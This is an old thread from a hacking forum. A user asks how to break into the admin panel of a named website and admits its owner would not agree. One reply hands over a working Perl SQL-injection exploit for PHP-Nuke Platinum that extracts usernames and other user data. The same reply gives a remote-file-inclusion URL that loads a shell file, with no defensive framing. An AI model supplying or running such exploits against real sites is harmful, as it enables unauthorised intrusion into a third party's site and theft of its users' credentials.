Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking (http://www.go4expert.com/forums/ethical-hacking-forum/)
-   -   Admin id and pw... (http://www.go4expert.com/forums/admin-id-pw-t10664/)

Omen 18May2008 05:44

Admin id and pw...
 
There is a site that I would like to get into..
It is owned by a very good friend of mine and I want to see if Ican get into it..

here is the link: http://www.udiclan.net/admin.php

Will someone tell me how I should get in that? :)

shabbir 18May2008 11:05

Re: Admin id and pw...
 
Ask your friend

Omen 18May2008 19:38

Re: Admin id and pw...
 
Do you honestly think he would tell me?

To be completely honest I really just woud like to know. How and what would I use to get into that site? He is my friend though

faizulhaque 24May2008 18:17

Re: Admin id and pw...
 
Nice Idia Given By Mr. Shabir

XXxxImmortalxxXX 12Jun2008 11:40

Re: Admin id and pw...
 
here u go

dynamic_titles.php exploit
Code:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id        name        username        user_email        femail        user_website        user_avatar        user_regdate        user_icq        user_occ        user_from        user_interests        user_sig        user_viewemail        user_theme        user_aim        user_yim        user_msnm        user_password        storynum        umode        uorder        thold        noscore        bio        ublockon        ublock        theme        commentmax        counter        newsletter        user_posts        user_attachsig        user_rank        user_level        broadcast        popmeson        user_active        user_session_time        user_session_page        user_lastvisit        user_timezone        user_style        user_lang        user_dateformatuser_new_privmsg        user_unread_privmsg        user_last_privmsg        user_emailtime        user_allowhtml        user_allowbbcode        user_allowsmile        user_allowavatar        user_allow_pm        user_allow_viewonline        user_notify        user_notify_pm        user_popup_pm        user_avatar_type        user_sig_bbcode_uid user_actkey        user_newpasswd        last_ip        user_color_gc        user_color_gi        user_quickreply        user_allow_arcadepm        kick_ban        user_wordwrap        agreedtos        user_view_log        user_effects        user_privs        user_custitle        user_specmsg        user_items        user_trade        points        user_cash        last_seen_blocker        user_login_tries        user_last_login_try        user_gender        user_birthday        user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        ${$v} = $ARGV[$a];
                }
        }
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
        $url = shift;
        $reg = shift;


        $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

        if ($content=~m/$reg/) {
            ($f,$s,$l) = split(">>",$1);
            $s =~s/ Post //;
            print $column.":".$s."\n";
        }
}



and

remote file inclusion vunerabitliy

Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
Lines:

----------------------------------------------
$phpbb_root_path = 'modules/Forums/';
include($nuke_bb_root_path . 'extension.inc');
include($nuke_bb_root_path . 'common.'.$phpEx);



Unless he has not updated his site platnium which is hte forum he is using is vunerable

if u dont know how to do then look up how to do it:)


All times are GMT +5.5. The time now is 00:00.